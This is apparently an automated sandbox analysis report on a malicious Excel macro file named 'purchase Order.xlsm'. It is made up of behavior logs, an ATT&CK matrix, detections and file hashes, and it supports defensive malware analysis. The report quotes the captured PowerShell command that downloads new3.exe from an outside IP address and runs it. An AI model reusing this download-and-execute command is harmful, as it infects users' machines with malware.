    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2812Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1232Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1232Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1164Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: powershell.exe, 00000002.00000002.425128661.00000000001BE000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exeJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exeJump to behavior
    Source: explorer.exe, 00000005.00000002.676532015.0000000000870000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000005.00000002.676532015.0000000000870000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000005.00000002.676532015.0000000000870000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
    Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection12Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local System1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion21LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSFile and Directory Discovery12Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    purchase Order.xlsm22%VirustotalBrowse
    purchase Order.xlsm100%AviraW2000M/YAV.Minerva.ssocv

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://212.192.241.75/sam/new3.exe-OutFile$env:public0%Avira URL Cloudsafe
    http://212.192.241.75/sam/new3.exeu0%Avira URL Cloudsafe
    http://212.192.241.75/sam/new3.exe1.0a.0%Avira URL Cloudsafe
    http://212.192.241.75/sam/new3.exePE0%Avira URL Cloudsafe
    http://212.192.20%Avira URL Cloudsafe
    http://212.192.241.75/sam/new3.e0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://212.192.241.75/sam/new3.exe0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpfalse
      high
      http://www.windows.com/pctv.explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpfalse
        high
        http://investor.msn.comexplorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpfalse
            high
            http://www.icra.org/vocabulary/.explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmpfalse
              high
              http://212.192.241.75/sam/new3.exe-OutFile$env:publicpowershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.425250143.0000000000444000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.425295083.0000000001BA6000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://212.192.241.75/sam/new3.exeupowershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.com/explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpfalse
                high
                http://212.192.241.75/sam/new3.exe1.0a.powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://212.192.241.75/sam/new3.exePEpowershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://212.192.2powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                low
                http://212.192.241.75/sam/new3.epowershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://www.%s.comPApowershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                low
                http://212.192.241.75/sam/new3.exepowershell.exe, 00000002.00000002.426079549.0000000002D91000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeexplorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpfalse
                  high

                  Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:510341
                  Start date:27.10.2021
                  Start time:18:07:47
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 50s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:purchase Order.xlsm
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal64.expl.winXLSM@6/7@0/0
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 1
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsm
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:08:24API Interceptor26x Sleep call for process: powershell.exe modified
                  18:08:27API Interceptor860x Sleep call for process: explorer.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B987DBE.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 1064 x 513, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):139201
                  Entropy (8bit):7.98388222737656
                  Encrypted:false
                  SSDEEP:3072:sWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yO:sWUMdF+Bcli6I37RBwcblAa
                  MD5:1007F58193E382DA00B74BD59C5AD1AD
                  SHA1:CBC27D302892B57019FCBD076ACEC67541B7C5A1
                  SHA-256:E5AFDB4BF82680681770132A53E16ED3341311D05BEB718AC0239B0D08B97218
                  SHA-512:65339D06D22255D2C6E42A0EF1B64EECD99509FD54A7E9EDBB899C1AEC0722DDAEB41462888387F95ED3135EC542900F3944793E2D658D9F1FEA8CA0345CEC28
                  Malicious:false
                  Reputation:low
                  Preview: .PNG........IHDR...(............8....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs..........o.d....tIME.....'........IDATx...w...u..?U=.X..A$..H.$.,.LQ9[.. [...u......}..%[...E.").$f...."g.9.b.t...4.3...@.!....]9........A@@.B.Z.........a.o>.....,.K...}.!.>.e......r.1!.Q.......F..t.P.0.6a......c..J./..D.D........J..BG..w.1........([CD.Z..uy..1...y`..@)...: .....B...nc1&./...J........I\K.AP"(.....q,5...F...t.F.A!@.*D..H.}7.qe.@;..G..........D.....!4.....a.LoO.n........A........VB..(..J)JJE..B}}}.0....R..T.]G.|.L'.+R....JW.c...a.b.Z.....r.7y.K.b.v.....(..b.,....w:(N....z{..W...>.m7.kK..|....?..`.1U...._u.?._...H....J.h;...../9...>..H.....`L..0....A..n.{.j.v. .v..[o..@W.......k...(."..1&.S..~....;....#.|./..w=....../._c..."2n.0..R*J...v.Sn...{.~.l.m"qC&...v<...U.Ra.{*ey......0F......V)..;=n....r....P..A...+...#_k....m.R.)5F..Y..y...A"BhL}...'E.D5...1dBc.[?...[G..G<......O0..u..$....'....].N....../.A.x.
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.580661409163492
                  Encrypted:false
                  SSDEEP:96:chQCcMqEqvsqvJCwoR4z8hQCcMqEqvsEHyqvJCworT4zIuYBHG4WDh/lUVP4A2:ciNoR4z8iVHnorT4zIi4WDhg4A2
                  MD5:76C9CAF04E2F94D16969BDCC015D2736
                  SHA1:11D5D36EEA31684EFA59BAEFFFC220BD6BF88143
                  SHA-256:F1BE95AF03D3FAAA1E264594DDDF096DA7652CE69F7F176FCCC9462E8174D2F8
                  SHA-512:FF062F1660B828A9A0E5C03FC37E374B994B2947B0F1144DCDEA11AFC5E5789872770256579F3E91BA8D8B3FA4AEFE5CC28255BD7625EC66A390FB3B1055C18D
                  Malicious:false
                  Reputation:low
                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C1EA73P0DJNYCFGDEJWJ.temp
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.580661409163492
                  Encrypted:false
                  SSDEEP:96:chQCcMqEqvsqvJCwoR4z8hQCcMqEqvsEHyqvJCworT4zIuYBHG4WDh/lUVP4A2:ciNoR4z8iVHnorT4zIi4WDhg4A2
                  MD5:76C9CAF04E2F94D16969BDCC015D2736
                  SHA1:11D5D36EEA31684EFA59BAEFFFC220BD6BF88143
                  SHA-256:F1BE95AF03D3FAAA1E264594DDDF096DA7652CE69F7F176FCCC9462E8174D2F8
                  SHA-512:FF062F1660B828A9A0E5C03FC37E374B994B2947B0F1144DCDEA11AFC5E5789872770256579F3E91BA8D8B3FA4AEFE5CC28255BD7625EC66A390FB3B1055C18D
                  Malicious:false
                  Reputation:low
                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  C:\Users\user\Desktop\AE430000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Excel 2007+
                  Category:dropped
                  Size (bytes):150224
                  Entropy (8bit):7.959524695989025
                  Encrypted:false
                  SSDEEP:3072:1+zWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6ypD:1mWUMdF+Bcli6I37RBwcblAdD
                  MD5:DE128D7EECA8D0A449D99F0C6B953892
                  SHA1:5B9234A64EE193CE91303ECA0168F853E4B5DEA8
                  SHA-256:8EDBE1C06C3528E1DCA93FDD5A4AECCD34F14E2310EC8857A4A96130A3EFEF74
                  SHA-512:FF4C1A208D13319972F9A48B232B836127EF4A89B035477887DA2A355E0705EFBBF10CCB94C0751A0F342B6764DE6D55DA9825B90382742142C2371676AF59AD
                  Malicious:false
                  Reputation:low
                  Preview: PK..........!................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TKO#1..#....I..Z.:...."-..L.v..8@..q....P.e.q..-.....3&2..........Y+.?..EE....<.b.$.'?....T1.S+....)Iu...sd....i&#.9.P......>..u..b2..)<.\.,.x.$....V..T+.+.r..".Z.@..(..|.z.W...0..C......P(.mO....\.d4V....8v..V..4..a..')...Ph...s.@.p..."...7.....=.d.:?E..= S.:Ue./.0...:.'...PL...t.......r(..g.=n.......H...q..lW.C..$..r...v....|../.\.|..k.c..&.)D......zA..0e..i.7K.E....w...j..h.~.N^.......PK..........!..U0#.
                  C:\Users\user\Desktop\AE430000:Zone.Identifier
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\Desktop\purchase Order.xlsmm (copy)
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Excel 2007+
                  Category:dropped
                  Size (bytes):150224
                  Entropy (8bit):7.959524695989025
                  Encrypted:false
                  SSDEEP:3072:1+zWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6ypD:1mWUMdF+Bcli6I37RBwcblAdD
                  MD5:DE128D7EECA8D0A449D99F0C6B953892
                  SHA1:5B9234A64EE193CE91303ECA0168F853E4B5DEA8
                  SHA-256:8EDBE1C06C3528E1DCA93FDD5A4AECCD34F14E2310EC8857A4A96130A3EFEF74
                  SHA-512:FF4C1A208D13319972F9A48B232B836127EF4A89B035477887DA2A355E0705EFBBF10CCB94C0751A0F342B6764DE6D55DA9825B90382742142C2371676AF59AD
                  Malicious:true
